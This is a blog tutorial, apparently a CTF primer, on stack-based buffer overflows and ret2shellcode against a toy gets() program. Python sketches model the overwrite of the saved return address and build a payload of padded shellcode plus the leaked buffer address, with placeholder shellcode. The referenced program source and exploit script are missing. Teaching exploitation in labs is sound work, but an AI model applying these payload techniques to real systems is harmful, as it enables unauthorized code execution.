Saturday, February 24, 2024

[pwn-primer] understanding ret2shellcode + understanding stack based buffer overflow

This post covers an essential pwn technique called ret2shellcode, also commonly referred to as shellcode injection. In a typical pwn challenge (especially an easy one), there's a win() function that we redirect program execution to in order to solve the challenge. However, there are cases where no win function exists. That's where this technique comes in.

Shellcode, in essence, is a short sequence of machine instructions (usually written in assembly) that an attacker injects into a process to make it run code of their choosing. In real exploits, it's used to either spawn a shell (root/admin or low privilege) or run commands such as displaying the contents of a critical file. In pwn CTF challenges, it's used to spawn a shell on the remote server to get the flag, or to display the contents of flag.txt directly.

I'll go over a simple program that can be exploited with the use of shellcode.


The program above is quite simple. It has only a main function, which defines a 256-byte character buffer, buffer_one, on the stack. A printf call then displays the address in memory where buffer_one is located. After that, a gets call reads user input into buffer_one.

Guess this is a good time to explain the vulnerability.

The vulnerability in this program is the gets call. Why? The buffer_one character buffer has been given a length of 256 bytes on the stack, but gets() reads user input without checking that no more than 256 bytes are written to that buffer. It just keeps copying until it hits a newline. The user input can therefore exceed 256 bytes and overwrite whatever sits next to the buffer in memory.
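To make the missing bounds check concrete, here is a toy Python model of the difference between an unchecked and a checked copy. It is only a sketch, not how libc implements anything: `gets_like`, `fgets_like` and the 16 "neighbour" bytes are names and values made up for illustration.

```python
BUF_SIZE = 256  # size of buffer_one in the post


def gets_like(memory: bytearray, start: int, data: bytes) -> None:
    """Copy all of data into memory at start, with no length check (like gets)."""
    memory[start:start + len(data)] = data


def fgets_like(memory: bytearray, start: int, data: bytes, size: int) -> None:
    """Copy at most size - 1 bytes and add a NUL terminator (like fgets)."""
    chunk = data[:size - 1]
    memory[start:start + len(chunk)] = chunk
    memory[start + len(chunk)] = 0


# 256 bytes of buffer followed by 16 bytes standing in for whatever sits next to it.
unsafe = bytearray(BUF_SIZE) + bytearray(b"N" * 16)
safe = bytearray(unsafe)

user_input = b"A" * 264  # 8 bytes more than the buffer can hold

gets_like(unsafe, 0, user_input)
fgets_like(safe, 0, user_input, BUF_SIZE)

print(bytes(unsafe[BUF_SIZE:]))  # the first 8 neighbour bytes were overwritten
print(bytes(safe[BUF_SIZE:]))    # the neighbour bytes are untouched
```

The unchecked copy spills 8 bytes into the neighbouring memory, while the bounded copy truncates the input and leaves it alone.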

All of this occurs in a region of memory called the stack. Every time a function in a C program is called, it gets its own slice of the stack, called a stack frame. A stack frame holds the local variables of the function it belongs to. For example, in the program above there is one stack frame for the main function, and the character buffer is local to that frame. The stack operates using PUSH and POP operations: PUSH places data on top of the stack and POP takes it back off.

A buffer overflow vulnerability can occur on the stack or in the heap, another memory region that deals with dynamically allocated memory, but this post focuses on the stack. A stack-based buffer overflow here means we can write past the end of the buffer and overwrite other important data on the stack, such as other local variables, the saved base pointer and, most importantly, the saved return address.

The saved return address on the stack points to where execution should continue once the current function has finished. By overwriting this saved return address with an address of our own, we can redirect execution to wherever we want.
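Here is a rough Python model of that overwrite. It assumes a simplified frame layout (256-byte buffer, then 8 bytes of saved rbp, then 8 bytes of return address); the real layout depends on the compiler and its flags. The helper names and all addresses are invented for the example.

```python
import struct

BUF_SIZE = 256  # size of buffer_one in the post


def build_frame(saved_rbp: int, return_addr: int) -> bytearray:
    """Toy stack frame: 256-byte buffer, then saved rbp, then return address."""
    return bytearray(BUF_SIZE) + struct.pack("<QQ", saved_rbp, return_addr)


def read_return_addr(frame: bytearray) -> int:
    """Read the 8-byte little-endian return address that follows the saved rbp."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]


# Made-up values standing in for a real saved rbp and return address.
frame = build_frame(saved_rbp=0x7FFFFFFFE500, return_addr=0x401136)
original = read_return_addr(frame)

# An unchecked write: 256 filler bytes, 8 bytes over the saved rbp,
# then 8 bytes that replace the return address.
overflow = b"A" * BUF_SIZE + b"B" * 8 + struct.pack("<Q", 0xDEADBEEF)
frame[0:len(overflow)] = overflow

print(hex(original))                 # return address before the overflow
print(hex(read_return_addr(frame)))  # attacker-chosen value after the overflow
```

When the function returns, the CPU loads whatever is in that slot into rip, which is why controlling those 8 bytes means controlling execution.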

Let's go back to the program and see this in action. 

After compiling the program with gcc and running it, we see its output.


As seen in the source code, the program prints the address of buffer_one on the stack. The empty line after it is the program waiting for input; this is where the gets() call is blocking. If we enter well over 256 bytes, the program should crash, and a crash is a strong sign that the buffer overflow vulnerability is present.


Feeding junk bytes into the program results in a segmentation fault. The program has crashed and the vulnerability is confirmed. As discussed before, there's no win function to redirect execution to, so shellcode will have to be used. Keep in mind that running shellcode from the stack only works if the stack is executable. pwntools is a Python library that assists with writing exploit scripts. It ships with ready-made shellcode for different operations across different architectures. In our case we're working with a 64-bit program, so the shellcode will use 64-bit instructions.

execve('/bin/sh') syscall shellcode


The shellcode above makes an execve syscall with the path '/bin/sh' as its argument to spawn a shell. If you're not familiar with how arguments are passed to functions and syscalls in 64-bit assembly, I recommend reading up on that first. The first 4 instructions push the path onto the stack and then put a pointer to it in rdi. The constant 0x732f2f2f6e69622f is the little-endian encoding of the bytes '/bin///s'; the extra slashes are just padding, and the path still resolves to /bin/sh. The following instructions use XOR and stack PUSH/POP operations to set up the remaining arguments and ultimately invoke execve.
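If the constant looks like magic, it can be decoded with a few lines of Python. This is just a sanity check on the value quoted above. The trailing `h` is an assumption: I'm guessing the shellcode pushes it separately, which is how it would complete the path.

```python
import posixpath
import struct

PATH_CONSTANT = 0x732F2F2F6E69622F  # value quoted in the post

# x86-64 is little-endian, so the least significant byte ends up first in memory.
raw = struct.pack("<Q", PATH_CONSTANT)
print(raw)

# Assumption: a trailing 'h' is pushed separately to complete the path.
full_path = (raw + b"h").decode("ascii")
normalized = posixpath.normpath(full_path)
print(full_path, "->", normalized)
```

The extra slashes exist only to pad the string to 8 bytes so it fits in a single 64-bit register.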

Final Exploit Script


The exploit script is quite simple, and most of it uses pwntools methods. I can't overemphasize how easy pwntools has made writing exploits. First, the script gets its shellcode from shellcraft.sh(), which is equivalent to the execve syscall shellcode we saw above. Next, it takes the stack address the program prints, parses it as a base-16 (hexadecimal) number and prints it to the screen. Lastly, the real payload is laid out in order: the shellcode plus capital A's (junk bytes) to fill the 256-byte buffer_one buffer, more junk (0xcafebabe) to overwrite the saved rbp, and finally the address of the buffer to overwrite the saved return address, so that rip ends up pointing at the start of the buffer. This places the shellcode on the stack and redirects execution to where it was injected, ultimately executing our own code.
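The payload layout can be sketched with nothing but the standard library. This is not the original exploit script, just a minimal reconstruction under a few assumptions: the buffer sits directly below the saved rbp, the leaked address is printed as a line like `0x7ffd5a3c1e10`, and `fake_shellcode` is a placeholder rather than working shellcode. In a real script the bytes would come from pwntools (`asm(shellcraft.sh())`) and `p64()` would replace `struct.pack("<Q", ...)`.

```python
import struct

BUF_SIZE = 256  # size of buffer_one in the post


def parse_leak(line: bytes) -> int:
    """Parse a printed hex address such as b'0x7ffd5a3c1e10\\n' into an int."""
    return int(line.decode().strip(), 16)


def build_payload(shellcode: bytes, buffer_addr: int) -> bytes:
    """Shellcode padded to the buffer size, junk for saved rbp, then the new return address."""
    if len(shellcode) > BUF_SIZE:
        raise ValueError("shellcode does not fit in the buffer")
    padded = shellcode.ljust(BUF_SIZE, b"A")      # shellcode first, then filler A's
    saved_rbp = struct.pack("<Q", 0xCAFEBABE)     # junk value for the saved rbp
    return_addr = struct.pack("<Q", buffer_addr)  # jump back to the start of the buffer
    return padded + saved_rbp + return_addr


fake_shellcode = b"\x90" * 48            # placeholder bytes, NOT working shellcode
leak = parse_leak(b"0x7ffd5a3c1e10\n")   # hypothetical leaked buffer address
payload = build_payload(fake_shellcode, leak)

print(hex(leak), len(payload))
```

Putting the shellcode at the very start of the buffer matters here, because the leaked address points at the first byte of buffer_one and that is exactly where execution lands.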

The exploit ran and we can see we have a shell. Quite a simple technique. I'm sure I butchered some of the explanation, but essentially this is how shellcode injection works: we inject shellcode onto the stack of a vulnerable process and make execution jump to where it was injected.

